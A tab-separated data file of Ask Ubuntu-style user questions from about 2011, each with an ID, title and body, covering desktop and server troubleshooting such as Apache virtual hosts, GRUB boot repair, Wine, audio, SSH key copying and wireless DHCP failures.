32367	bind example.com locally	how can i bind example.com to be served by the apache , i have running locally on the machine for development purposes ? i tried adding this in my /etc/hosts file 127.0.0.1 example.com and reloaded apache2 sudo /etc/init.d/apache2 reload but that did n't work . i have added the virtual hosts for example.com and also enabled it by a2ensite edit : apache error log ( nothing related as far as i can tell ) [ mon mar 28 15:21:01 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) configured -- resuming normal operations [ mon mar 28 15:21:03 2011 ] [ notice ] graceful restart requested , doing restart [ mon mar 28 15:21:03 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) configured -- resuming normal operations [ mon mar 28 15:21:23 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ mon mar 28 15:21:23 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ mon mar 28 15:35:34 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/phpmyadmin [ mon mar 28 15:36:48 2011 ] [ notice ] caught sigterm , shutting down [ mon mar 28 15:36:49 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) php/5.3.3-1ubuntu9.3 with suhosin-patch configured -- resuming normal operations [ mon mar 28 15:49:13 2011 ] [ notice ] graceful restart requested , doing restart [ mon mar 28 15:49:13 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) php/5.3.3-1ubuntu9.3 with suhosin-patch configured -- resuming normal operations [ mon mar 28 15:49:17 2011 ] [ notice ] caught sigterm , shutting down [ mon mar 28 15:49:18 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) php/5.3.3-1ubuntu9.3 with suhosin-patch configured -- resuming normal operations [ mon mar 28 15:50:24 2011 ] [ notice ] graceful restart requested , doing restart [ mon mar 28 15:50:24 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) php/5.3.3-1ubuntu9.3 with suhosin-patch configured -- resuming normal operations [ mon mar 28 16:15:09 2011 ] [ notice ] graceful restart requested , doing restart warning : documentroot [ /home/ashfame/www/example.com/ ] does not exist ( 2 ) no such file or directory : apache2 : could not open error log file /home/ashfame/www/example.com/error.log . unable to open logs [ mon mar 28 16:46:18 2011 ] [ warn ] pid file /var/run/apache2.pid overwritten -- unclean shutdown of previous apache run ? [ mon mar 28 16:46:18 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) php/5.3.3-1ubuntu9.3 with suhosin-patch configured -- resuming normal operations [ mon mar 28 16:46:25 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/example.com [ mon mar 28 16:46:38 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/www [ mon mar 28 16:55:48 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/phpbb/phpbb [ mon mar 28 17:17:40 2011 ] [ notice ] caught sigterm , shutting down [ mon mar 28 17:17:41 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) php/5.3.3-1ubuntu9.3 with suhosin-patch configured -- resuming normal operations [ mon mar 28 17:19:29 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/example.com also i try doing wget -- spider http : //example.com which shows hosts file is doing it work but in browser it opens http : //www.iana.org/domains/example/ ashfame @ ashfame-desktop : /usr/sbin $ wget -- spider http : //example.com spider mode enabled . check if remote file exists . -- 2011-03-28 17:20:57 -- http : //example.com/ resolving example.com ... 127.0.0.1 connecting to example.com|127.0.0.1|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] remote file exists and could contain further links , but recursion is disabled -- not retrieving . virtual host configuration file : # place any notes or comments you have here # it will make any customization easier to understand in the weeks to come < virtualhost *:80 > # admin email , server name ( domain name ) and any aliases serveradmin webmaster @ example.com servername www.example.com serveralias example.com # index file and document root ( where the public files are located ) directoryindex index.html documentroot /home/ashfame/www/example.com/ # custom log file locations loglevel warn errorlog /home/ashfame/www/example.com/error.log customlog /home/ashfame/www/example.com/access.log combined < /virtualhost >
32375	no boot in partition problem after ext3 format	i had a win 7 64bit and 10.04 dual boot . however , a friend mistakenly formatted the ubuntu partition with my partition software ( paragon partition server 10 ) and after a restart i was greeted with a black screen 'no boot partition ' . my question now is how do i recover my win 7 boot loader and install 11.04 when it drops . thanks in advance
32377	ubuntu 11.04 - no unity in live-mode using a nvidia graphicscard	id like to install ubuntu 11.04 on my desktop computer . i heard that there are still problems using unity with nvidia graphics cards . in my case i have got a nvidia gtx 460 . i tried a live image and there was no working unity . i got nautilus , windows 2000-theme . no compiz . should i probably first install ? perhaps than unitys working fine ?
32383	adjust pcm volume ?	the default sounds levels of master volume 100 % , application/stream 100 % , are too loud through my headphones . i can adjust applications or the master volume down , but if a new application makes a sound it is deafening . also the master volume has reset to 200 % before when fiddling with the equalizer - so i 'm kind of scared of relying on that now at the moment i adjust the master , but i have it close to 25 % meaning a slight increase will usually make it too loud . previously when using alsa , i could have the pcm volume set to 25 % then adjust the master volume from 0-100 % . however now in pulse audio if i set the pcm volume and then change master volume the pcm will be reset to 100 % . any suggestions ? i 've pretty much stopped listening to music because i 'm ( some what irrationally ) scared of it now
32384	init not found try passing init=bootargs	i tried to install ubuntu in my sony cs17g notebook . after selecting the option `` install ubuntu '' from the boot menu , i am always getting the error.. init not found . try passing init=bootargs . ( initramfs ) after surfing the net i came to know that sudo command will help me to fix the issue which requires a terminal . from the ( inittamfs ) prompt , how should i open a terminal . on using sudo command , i getting an error that 'sudo not found ' . please help me in fixing the issue .
32386	dos batch script in wine	there is a windows program i 'm trying to run . when i run it , it says wine : can not find : '' c : \\windows\\system32\\do.exe '' i ca n't find a do.exe program on my windows computer . i suspect it 's trying to run some kind of command script internally ( earlier it asked for system32\find.exe , which i was able to copy over ) . so , is there a better way to run this so that wine will be able to translate and run the script correctly ?
32395	can i change the firefox menu to look like the firefox menu in windows ?	why firefox 's main menu is different in ubuntu ( 10.04 ) and windows 7 ? is different main theme ? . can i change the ubuntu firefox menu to look like windows 7 menu ?
32396	why is ubuntu 10.10 64-bit lagging horribly in a vm ( vm player ) ?	i am currently running a vm of ubuntu 10.10 within vmware player ( host & vm stats below ) and i 'm getting horrific lag . i 've executed the initial setup of the vmware files but nothing beyond that . i 'm not really sure where to go from here and any help would be awesome . the weird thing is , its not laggy all of the time . occasionally it 'll be snappy as if it were host os . i ca n't place the rhyme or reason as to why it would act that way sometimes and not others . host windows 7 x64 ultimate sp1 intel q6600 ( quad core cpu ) 8 gb ram 4 x 500gb 7200rpm drives in raid 10 virtual machine ubuntu 10.10 x64 vmware player v3.1.3 3gb memory ( reduced from 6 gb memory in hopes it was just a paging issue ) 100 gb flexible drive out of a 120 gb partition
32402	amd64 , i386 ( 32bit / 64bit ) - which version to choose ?	can every cpu ( in my case a intel i7 890 ) install both of them ? amd64 and i386 ? i would like to install ubuntu 64bit . so what is the right download ?
32403	error while trying to install wine 1.3	am i doing something wrong ? sudo add-apt-repository ppa : ubuntu-wine/ppa executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv 883e8688397576b6c509df495a9a06aef9cb8db0 gpg : requesting key f9cb8db0 from hkp server keyserver.ubuntu.com gpgkeys : http fetch error 7 : could n't connect to host gpg : no valid openpgp data found . gpg : total number processed : 0
32407	see-through or completely disable wallpaper in kde ?	here 's my situation : i run compiz desktop cube , with skydome enabled , on kubuntu 10.10 . i would like to 'disable ' or make the kde wallpaper completely transparent , making the skydome my 'wallpaper replacement ' . is there any way to do this ?
32413	copy with ssh with port other than 22	how do i copy files from my local to some remote server which hosts ssh on port other than default ( 22 ) . i usually connect to the server using ssh username @ remotehost.com -p 2000 now i need to copy files with scp user @ localbox : ~ $ scp ~/.ssh/id_rsa.pub user @ remotebox.remotedomain.tld : ~/.ssh/id_rsa_localbox.pub -p 2000 but this does not work .
32416	customizing api keys in gwibber ?	in lucid when i post new status to twitter it says 'via ubuntu ' instead of 'via gwibber ' . i wonder where gwibber store its settings for the api keys so that i can modify it to anything i like .
32418	is there an easier way to chroot than bind-mounting ?	most of the time i use the chroot to rescue an existing installation from usb . when i chroot into another system i have to manually bind-mount proc , sys , dev and dev/pts by issuing for example : mount -- bind /proc proc/ is there an easy way allready implemented in a standard ubuntu install ?
32420	what is the term for the unity-menu/panel/input/taskbar/sidebar ?	i.e. , under unity , what is the term for the panel that is opened when i press the super or window key that allows me to search for what i want to open or do ? i 've been tripping over myself with some bug reports , so i 'd like to get my terminology straight before i make any more of a fool of myself !
32424	how do i get a slingbox/slingplayer working ?	how can i get my slingplayer/slingbox setup to work on my 10.10 install ? i do n't know if using wine will work or if vm will work . this is almost the only reason i flip back to windows on my dual boot machine . thanks .
32429	problems installing packages from downloaded files using terminal	i am facing problems installing packages from downloaded files using terminal . for ex - i downloaded goobox-2.2.0.tar.gz , i extracted using archive manager . then i opened terminal in folder and typed - ./ configure but then an error pops up permission is denied . i wanted to know how to install programs using terminal and how i can rectify the problems ?
32438	how to share one pgp-key on multiple machines ?	how can i export a pgp-key from one machine and import it to another ? the only way i figured out ( in seahorse ) was to import it to the section other keys . but i want to use one single pgp-key from diffrent machines . is this easier to solve via terminal and gpg ? i 'm a little bit confused about seahorse .
32440	after update : `/var/lib/dpkg/tmp.ci/md5sums ' : is a directory	after updating my system today the following showed up . this is the result of running apt-get install -f : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libjna-java libswing-layout-java libofx4 libosp5 libgsasl7 javahelp2 fairymax libequinox-osgi-java libfelix-main-java libntlm0 python-enchant visualvm libfelix-framework-java libgtkglext1 python-storm libnb-platform12-java msmtp use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libdbus-1-dev the following packages will be upgraded : libdbus-1-dev 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0b/25.9kb of archives . after this operation , 0b of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... dpkg : warning : files list file for package `linux-firmware ' missing , assuming package has no files currently installed . ( reading database ... 516716 files and directories currently installed . ) preparing to replace libdbus-1-dev 1.4.0-0ubuntu1.1 ( using ... /libdbus-1-dev_1.4.0-0ubuntu1.2_i386.deb ) ... unpacking replacement libdbus-1-dev ... dpkg : error processing /var/cache/apt/archives/libdbus-1-dev_1.4.0-0ubuntu1.2_i386.deb ( -- unpack ) : unable to install ( supposed ) new info file `/var/lib/dpkg/tmp.ci/md5sums ' : is a directory errors were encountered while processing : /var/cache/apt/archives/libdbus-1-dev_1.4.0-0ubuntu1.2_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the remark about the files list for linux-firmware missing is because i deleted those , as this was contributed as a solution to this problem . however , it did n't work out ... any help would be most appreciated , since i can no longer do any installations at all !
32441	does ubuntu use security features like dep and alsr ?	i often read that features such as dep ( data execution prevention ) and aslr ( address space layout randomization ) are provided on windows . on windows , you are given some control over turning on dep for 32-bit programs . are these features available in ubuntu is there anything we need to do to turn these features on ?
32446	pdftohtml outputting low resolution background images . help ?	runnning : pdftohtml -c document.pdf output.htm this returns the normal output but the background images are of such low quality they can not be read . is this a bug with pdftohtml or can i change a config file somewhere ? any help would be much appreciated , cheers : ) running : ubuntu 10.04 lts
32447	how do i disable compiz in the ubuntu classic session ?	i would like to disable compiz in natty ( ubuntu classic ) . i have tried to access this through system > preferences > appearance but the `` visual effects '' tab is no longer there . on previous releases the following gconf key makes the switch : /desktop/gnome/session/required_components/windowmanager value to have visual effects off : metacity value to have visual effects on : compiz on natty this key is set to gnome-wm which seems to have a lot of added eyecandy ( effects/shading ) as opposed to metacity in the previous release , and which i would like to turn off .
32448	what is the proper way to install puppet on a server ?	we 've got several ubuntu 10.04 servers and i 'm looking to deploy puppet for configuration management . the machines already have rvm installed with ruby 1.9.2 as default . i 've tried running puppetmasterd under sudo and puppet is throwing a few errors depending on how i run the service . i installed puppet via gem , but i was wondering if there was a more canonical ( no pun intended ) means of getting puppet up and running that was ubuntu specific . google did n't turn up much and the best i could find was this entry in the puppet wiki : http : //projects.puppetlabs.com/projects/1/wiki/puppet_ubuntu i know that ubuntu 's ruby packages are in disarray , so is this a valid means of installing and running puppet ? thanks !
32449	rhythmbox playing an .asx internet radio file	i have a problem with playing internet radio . the stream is http : //www.daveramsey.com/radio/home/the_dave_ramsey_show_live.asx it plays in google chrome , and vlc but not rhythmbox . i want it to play in rhythmbox because it integrates with ubuntu better . how do i get this to play in rhythmbox ?
32452	bug in chrome tab when loading , loading `` animation '' is all over the place	an image is worth a thousand words : i have n't noticed it for any other site that the stack exchange network . ( maybe it is just coincidence as it is not consistent ) . if i leave it alone it goes away ( i think ) but as soon as i roll over it , it definitely goes away . has anybody encountered this before ? thanks in advance ! is this questions for super user ?
32457	rooted nexus one does n't show up in banshee	i have follow the instructions found here : http : //forum.xda-developers.com/showthread.php ? t=624240 but my nexus one does n't show up in banshee ( the mass storage plugin is enabled ) . has anyone had any luck getting this working ? this is with banshee 1.9.5 .
32458	how to share internet by creating virtual access point in ubuntu	please are there any software or workaround in ubuntu by which we can share internet by creating virtual access point like it is been done in windows using virtual router or connectfy .
32468	how do i get an hp storageworks msa1500 working ?	i have a : hp storageworks msa 1500 , with 12 disks and a total capacity of 6tb . i want to connect it to a computer running a linux distribution , more precisely ubuntu 10.10 do you think that such thing is possible and if so could you please point me some tips or documentation that could help me configuring such a system . i want to be able to connect the pc to my home network . any help will be greatly appreciated
32470	how do i install rabbitmq ?	can someone please help me by letting me know how to install rabbit mq server ... any links are heartily welcomed ...
32474	will two internet connections be utilized by default ?	if i have two connections to the internet ( one via eth0 and the other via wlan0 ) , will both be utilized by default ? ... or do i have to make some adjustments in order to have applications take advantage of both connections ?
32480	how do i boot from a grub menu ?	i recently added another partition to my hardrive where ubuntu was installed to and afterwards when i booted ubuntu i got sent to the grub rescue > terminal . the fix for that was that i had to reinstall grub on the correct partition for ubuntu to boot again . so i followed all the instructions from ubuntu to fix it from the live cd here https : //help.ubuntu.com/community/grub2 # reinstalling % 20grub % 202 . after i was done doing that i rebooted and the grub > terminal is now there . i would usually see a list to choose from with my os but im guessing i have to update grub when i reboot or load the menu list . the problem is i did a lot of research to figure out how to boot from grub > but i can not find a way to do so . it is not easy finding a tutorial for doing so and i am completley stuck . i would like to know an easy way to boot into my ubuntu from grub and making the booting as it was before i made the partition . please any help would be greatly appreciated for i need to get on my ubuntu to start doing some work ...
32481	when i copy something from another window and do `` +gp gvim says 'nothing in register g ' ?	when i copy something from another window and do `` +gp gvim says 'nothing in register g' but when i go to edit_ > paste it does paste the text from the another window . i 'm using ubuntu 10.10 . any suggestions ?
32482	how do i change my monitor 's resolution when working in a virtual terminal ?	when using a virtual terminal with an external monitor , i would like to set the resolution to the monitors optimal resolution , but i 'm not sure how . does anyone know how i would go about doing this ?
32483	can you set keep aligned to off by default on desktop ?	can you set `` keep aligned '' to off by default on desktop ? ubuntu 10.10 64 bit
32484	how to boot from ubuntu live usb with 'try ubuntu ' directly ?	i created an ubuntu 10.10 live usb with persistence feature . and it works well on my pcs . but one thing annoys me is that each time i boot from live usb , i have to choose between `` try ubuntu '' and `` install ubuntu '' . is there any way to dismiss that dialog and boot directly to the live ubuntu system ?
32485	how to use application indicator for kde application ?	how can i use libappindicator to create an application indicator for a kde app in c++ without using gtk ? the example shown here uses gtk to create the menu . is this necessary ? is there a kde application somewhere that uses an application indicator that i can check out ? ( i wanted to tag this question with appindicator and libappindicator , but i do n't have enough `` reputation '' to do that . )
32495	fan not working at all	i have a dell studio 15 laptop . it has an ati mobility radeon graphics card using the opensource drivers it is running ubuntu 10.04 it runs for a while ( 10-20 minutes ) and then turns off . acpi -t shows the cpu temperature slowly rising until it turns off . acpi -c shows two cooling devices both set to 0 ( off ) i 'm worried that this is damaging my laptop . is their a way to force the fan to turn on any other way to solve this problem . i logged into the bios to see if there was any way to force the fan on , while it was in the bios screen the computer turned off . does this suggest its not a ubuntu problem ? i tried running ubuntu 10.10 from a live cd , but still no fan , i turned it off when the temperature got to 95 degrees . installed windows vista on it and still no fan . i 'm guessing it 's a hardware problem at this point
32499	migrate from a virtual machine ( vm ) to a physical system	aka : how can i convert a .vdi or .vmdk to a real installation on a physical disk ? is it possible/feasible to migrate a virtual machine installation of ubuntu onto a physical machine ? if possible , how difficult would this be to accomplish and what steps would i need to take to prepare for the migration . i 'd like to do some testing on a vm and if it works out migrate that system to physical hardware instead of reinstalling everything . is this possible ?
32507	how do i get a list of installed files from a package ?	i want to know where i can find my installed application when i installed it on ubuntu using package manager . i installed rabbitmq and ran locate rabbitmq which gave me following result : /home/anupamg/.m2/repository/com/rabbitmq /home/anupamg/.m2/repository/com/rabbitmq/amqp-client /home/anupamg/.m2/repository/com/rabbitmq/amqp-client/1.7.2 /home/anupamg/.m2/repository/com/rabbitmq/amqp-client/1.7.2/_maven.repositories /home/anupamg/.m2/repository/com/rabbitmq/amqp-client/1.7.2/amqp-client-1.7.2.jar /home/anupamg/.m2/repository/com/rabbitmq/amqp-client/1.7.2/amqp-client-1.7.2.jar.lastupdated /home/anupamg/.m2/repository/com/rabbitmq/amqp-client/1.7.2/amqp-client-1.7.2.jar.sha1 /home/anupamg/.m2/repository/com/rabbitmq/amqp-client/1.7.2/amqp-client-1.7.2.pom /home/anupamg/.m2/repository/com/rabbitmq/amqp-client/1.7.2/amqp-client-1.7.2.pom.lastupdated /home/anupamg/.m2/repository/com/rabbitmq/amqp-client/1.7.2/amqp-client-1.7.2.pom.sha1 /home/anupamg/downloads/rabbitmq-server-generic-unix-2.4.0.tar.gz
32512	i get a second menu on my dual boot machine after i choose windows xp , i then have to choose again	i installed windows xp home on a new built machine . the boot from cd was not working so to get the ubuntu 9.04 disk to run i installed the ubuntu 9.04 boot/autorun/start utility . the installation went well and i have now upgraded to 10.10 . however , now on boot i have to choose which os to boot to twice . once with grub and then with what looks like the utility i installed from ubuntu 9.04 . how do i get rid of the ubuntu 9.04 utility ?
32514	fixing ip renewal after laptop suspend	i have a macbook pro 5.5 running ubuntu 10.04 , and i 've noticed that with some wifi networks , but not all , i 'm unable to reconnect after coming out of suspension . i 've tried both network manager and wicd management daemons , and both get through validation , but get hung up on `` acquiring ip address ... '' . the only solution i 've found is to reboot the machine , after which it acquires an ip address very quickly . what 's the underlying issue here ? what would be a more efficient way to resolve the problem ? edit : i 've noticed that if i open wicd and manually press `` connect '' , it fails to acquire an ip . however , if i do nothing and let it automatically try and connect , it acquires an ip and connects just fine ... edit : note , this problem is dependent on the wireless router i 'm trying to connect to . i have no problems with a basic linksys wifi router , or the wireless router simulated by an android wireless tethering app . however , old crappy cisco/comcast/verizon home wireless routers always seem to give me headaches with connecting only after i suspend . if i reboot , i can connect to them immediately . edit : i tried adjusting the dhcp client setting in wicd . originally , it was using dhclient , and a failed connection attempt would create a log like : 2011/07/28 20:55:35 : : listening on lpf/eth2/00:26 : bb:1b:90 : cc 2011/07/28 20:55:35 : : sending on lpf/eth2/00:26 : bb:1b:90 : cc 2011/07/28 20:55:35 : : sending on socket/fallback 2011/07/28 20:55:35 : : dhcpdiscover on eth2 to 255.255.255.255 port 67 interval 5 2011/07/28 20:55:40 : : dhcpdiscover on eth2 to 255.255.255.255 port 67 interval 10 2011/07/28 20:55:50 : : dhcpdiscover on eth2 to 255.255.255.255 port 67 interval 11 2011/07/28 20:56:01 : : dhcpdiscover on eth2 to 255.255.255.255 port 67 interval 18 2011/07/28 20:56:19 : : dhcpdiscover on eth2 to 255.255.255.255 port 67 interval 17 2011/07/28 20:56:36 : : no dhcpoffers received . 2011/07/28 20:56:36 : : no working leases in persistent database - sleeping . 2011/07/28 20:56:45 : : dhcp connection failed 2011/07/28 20:56:45 : : exiting connection thread 2011/07/28 20:56:45 : : sending connection attempt result dhcp_failed 2011/07/28 20:56:45 : : attempting to set hostname with dhclient 2011/07/28 20:56:45 : : using dhcpcd or another supported client may work better 2011/07/28 20:56:45 : : attempting to set hostname with dhclient 2011/07/28 20:56:45 : : using dhcpcd or another supported client may work better noting the recommendation to try dhcpcd instead , i installed , restarted the wicd service , and set it to use dhcpcd . unfortunately , the problem remains , with an even less helpful log : 2011/08/01 19:44:56 : : connecting to wireless network crappyciscorouter 2011/08/01 19:44:56 : : putting interface down 2011/08/01 19:44:56 : : releasing dhcp leases ... 2011/08/01 19:44:56 : : setting false ip ... 2011/08/01 19:44:56 : : stopping wpa_supplicant 2011/08/01 19:44:56 : : flushing the routing table ... 2011/08/01 19:44:56 : : putting interface up ... 2011/08/01 19:44:58 : : attempting to authenticate ... 2011/08/01 19:45:02 : : running dhcp with hostname localhost 2011/08/01 19:45:22 : : err , eth2 : timed out 2011/08/01 19:45:22 : : 2011/08/01 19:45:22 : : dhcp connection failed 2011/08/01 19:45:22 : : exiting connection thread 2011/08/01 19:45:22 : : sending connection attempt result dhcp_failed edit : i 'm 99 % convinced this is some sort of bug with the proprietary broadcom sta driver and how it handles power management ( i.e . suspending ) , since rebooting my entire system fixes it , and i 've never experienced the problem on linux devices with non-broadcom wireless drivers . which is frustrating ... because that does n't leave me with much recourse since i ca n't find any open source alternative to broadcom 's crappy driver .
32517	recording output while listening to it	i 've tried to record the output of my acer laptop , using audio recorder and outrec . but for some reason , i 'm able to do so , just when i change my sound profile to digital stereo duplex , and then i 'm not able to listen to it . so for me it 's either listening or recording . ca n't have both at the same time . what can i do about it ? p. s , i also tried audacity , and it did n't work either .
32519	how to prevent seahorse from asking for a passphrase ?	i 've created one password-protected rsa key to access my remote server via ssh using key-based authentication and added it to seahorse using ssh-add . i would like to prevent seahorse from asking me for the passphrase on every login . is there any way to disable this ? or to enter it forever ? or to have one one user given trusted access forever ?
32520	is ubuntu 's mouse ( pointer ) weird ?	i used ubuntu 10.04 previously and 10.10 now . what i felt is , it 's pointer is a bit weird . it does point exactly on the target area but it slightly trembles or shake while the finger is on touchpad.some of u might have noticed and may be not.similar is not the case in windows . i found this case in my friends ubuntu too . is this the bug ? if yes , anyway to fix it ?
32521	how to fix tv-out on my ati radeon hd2600 ?	i have toshiba satellite a210 with ati radeon hd2600 and open source drivers . everytime i connect computer to tv ( through s-video ) , picture on the tv flashes . how can i fix this ? thanks .
32524	why are there ppas for each ubuntu version ?	and not one ppa , which fits for every ubuntu version and all the following versions ? a global ppa would be a nice idea .
32525	some `` for purchase '' apps not visible in software centre	i recently read that uplink was available from software centre . but i go to the `` for purchase '' section of the software centre and there are only 7 entries . there 's no trace of uplink ( or darwinia ) . i 'm running 32-bit natty and have refreshed my software sources , installed all updates , etc . is this app not available because i live in australia ? is there any way to make it appear so i can spend my $ $ ?
32527	how to delete and create a new firefox profile from tty1 ?	how to delete and create a new firefox profile from tty1 ?
32530	how to configure bootpd server ?	how to configure bootpd server for a testing environment ?
32531	if i install a beta or alpha will i have to reinstall when it is finally released ?	so with beta 1 just around the corner , i was wondering : will i have to reinstall ubuntu if i install beta 1 when the final release comes out or will it update itself to release quality ? i 'm eager to install 11.04 but do n't really want to bother if i 'll have to install all over again ( losing customisations ) in a month 's time .
32540	ubuntu server unstable performance	i am experiencing frequent drops in performance of my server ( affects both webserver performace and ssh ) . it may work fine all day and then suddenly pages load 10 times slower . after awhile it comes back to normal performance . reboot also helps . please suggest how to investigate this ? prerequisites : ubuntu 10.10 server , with most recent updates ( including kernel ) lamp : apache/2.2.16 , php 5.3.3 , mysql 5.1.49
32543	@ app_indicator_cflags @ : no such file or directory	( migrated from ubuntu forums . ) i 'm somewhat new at building , so i 'm hoping this is an easy explanation . downloaded nautilus source to patch for transparent background . patching went well and fine . during building i received this : making all in libnautilus-private make [ 2 ] : entering directory `/home/ [ x ] /nautilus-2.32.0/libnautilus-private' gen nautilus-marshal.h gen nautilus-marshal-guts.c cc nautilus-autorun.lo gcc : @ app_indicator_cflags @ : no such file or directory make [ 2 ] : *** [ nautilus-autorun.lo ] error 1 make [ 2 ] : leaving directory `/home/ [ x ] /nautilus-2.32.0/libnautilus-private' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/ [ x ] /nautilus-2.32.0' make : *** [ all ] error 2
32549	using adobe digital editions to transfer books to the nook , or a workaround	i 've successfully installed adobe digital editions using wine in linux mint 10 , and it appears that the program operates normally for the most part , as i can open ebooks and view my library . however , in windows , when i plug in my nook , the nook shows up in ade in my library view . it does not do so in linux . i can simply copy the files to the nook , as linux treats it as a mass storage device , but i download library books , and i think ade has to do something special with the books for them to be recognized by the nook as having the correct copyright info . so , i have 2 questions . 1 ) is it possible to get the nook to show up in ade ? 2 ) if not , is there a sufficient workaround ? for instance , get ade to `` authorize '' the book , then simply transfer it over to the nook as mass storage device via command line or drag and drop . or does ade even need to do this ? note : i have used the configure wine program to map /media/nook to the d : drive , but it still does n't work .
32552	forceably set permissions when running rsync	currently i am backing up gigabytes and gigabytes of data from a live server to a backup server using an rsync/ssh combination script , allowing for automated operation every night with a cron job . the problem i am having is with permissions . running rsync with -a mode copies over the user : group and filemode , which are currently 54122 : games and -rwx -- s -- - . in order to be able to execute the files on the backup server ( do n't ask me why the employer requires this ) , i 've had to run a time- and cpu-costly ( because of the sheer amount of data transferred ) chown ( ) and chmod ( ) setting every file/folder to www-data : www-data and permissions of 755 . is there anyway i can setup rsync to forcibly set each file/folder to www-data : www-data and 755 or am i looking at this problem from the wrong angle ? i guess i could run -rltd instead of -a ( which is equivalent to -rlptgod ) but then what happens to new files ? what permissions and owner : group settings do they receive ?
32554	cat command - will it overwrite ?	in order to pass the contents of one file to another we can , for example : cat ~/temp_minhakey.pub > > ~/.ssh/authorized_keys let 's say , we need to append more content to authorized_keys , but we do n't want to overwrite it . should we use cat again for the next keys ? or should we flag with something specific ? thanks in advance .
32555	ubuntu updated and now the option to boot into windows xp is missing	i have a dual boot of ubuntu 10.04 and windows xp . after allowing ubuntu to update itself and installing some new programs , i restarted the system , expecting an option to choose for windows xp . unfortunately , the boot did n't give me an option to choose xp . my xp is still on the drive , because i can access xp files from ubuntu . i ran update-grub and got these results g @ g : ~ $ sudo update-grub [ sudo ] password for g : generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.32-30-generic found initrd image : /boot/initrd.img-2.6.32-30-generic found linux image : /boot/vmlinuz-2.6.32-27-generic found initrd image : /boot/initrd.img-2.6.32-27-generic found linux image : /boot/vmlinuz-2.6.32-25-generic found initrd image : /boot/initrd.img-2.6.32-25-generic found linux image : /boot/vmlinuz-2.6.32-24-generic found initrd image : /boot/initrd.img-2.6.32-24-generic found linux image : /boot/vmlinuz-2.6.32-23-generic found initrd image : /boot/initrd.img-2.6.32-23-generic found linux image : /boot/vmlinuz-2.6.32-22-generic found initrd image : /boot/initrd.img-2.6.32-22-generic found linux image : /boot/vmlinuz-2.6.31-21-generic found initrd image : /boot/initrd.img-2.6.31-21-generic found memtest86+ image : /boot/memtest86+.bin found microsoft windows xp professional on /dev/sda1 done g @ g : ~ $ but still no windows . what can i try next ?
32559	wireless button display turns on and off repeatedly	i installed 10.10 recently and immediately noticed that the wireless button display ( blue indicates on and red indicates off ) goes blue and red repeatedly when i 'm connected to any wireless connection . any fix available for that , by the way my laptop model is hp pavilion dv6700 .
32565	apparmor not starting with kernel lsm error	starting apparmor on a ubuntu lucid lynx gives the following : user @ host : ~ $ sudo /etc/init.d/apparmor start * starting apparmor profiles * apparmor not available as kernel lsm . ... fail ! googling a bit , i found the following bug report - marked as fixed - : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/375422 which seems to be my exact case . my kernel is 2.6.32-21-generic . any idea on how to solve the issue ?
32575	what usb 3g dongles are working in canada ?	i am looking for a pay-as-you-go usb 3g modem that i could install on a netbook under ubuntu . i am in canada , and would like to stay away from bell . any brand name / model number that was tested to work under ubuntu ?
32577	can i sync an ipodtouch with both a mac and ubuntu ?	i 've seen a whole bunch of posts on itunes replacements for ubuntu , and how to sync your ipodtouch with banshee , rhythmbox , etc . but here 's my question : can you sync an ipod with both a mac and an ubuntu machine ? i know if you try to sync a single ipod with itunes on 2 different computers it wo n't let you . but i 'm not trying to sync with itunes on both computers . background : i use a mac at work and ubuntu at home . i 'd like both computers to contain all of my music . i do n't want to manually copy files by mounting the ipod as a disk . is this possible ? i 'm fine with somehow declaring one machine as the `` master '' library ( i.e . doing all downloads/purchases/deletes on that machine , then syncing the ipod to it and then syncing the second computer to the ipod . ) i 'm using : ipodtouch 4g , mac osx ( 10.6.7 snow leopard ) , ubuntu maverick
32581	a browser that supports css3 3d transforms ?	i am doing web development on a ubuntu machine ( lubuntu 10.10 more specifically ) , and wondered if there is a browser that i can install ( in the repositories or otherwise ) that has decent support for css3 3d transforms ( by using the word 'decent ' here , i exclude chromium which is incredibly glitchy ) . thing is , i hate switching to a different machine that runs windows , just to test my code . thanks in advance .
32583	which live cd should i use to repair my ext4 partition on a macbook pro ?	i have been affected by an ext4 unmountable problem . the suggested solution is to run e2fsck in a live cd . ubuntu ca n't be used because it periodically tries to mount the partition ( /dev/sda3 in my case ) preventing e2fsck from running . in other words , in order to recover ubuntu , i want to try using a non-ubuntu live cd . other people have had success with slax . but it does n't work on macbook . what live cds will work on my macbook ?
32589	dell dimension c521 wo n't automatically connect to a wired network	my parents were having continuous trouble with windows vista . the problem was that vista refused to connect to the wired network set up for them , and if it did it would only last for a day or two and then quit . finally yesterday it quit connecting completely no matter what i did , so i took the initiative to install ubuntu onto their computer . ( needless to say , they love it since i installed a mac osx theme and docky : ] . ) the wired network connects just fine but i have to manually connect to it via the launcher bar up top every time it boots up . this would n't bug me if it was my computer but i do n't want my parent 's to have to remember how to connect each time , any help ?
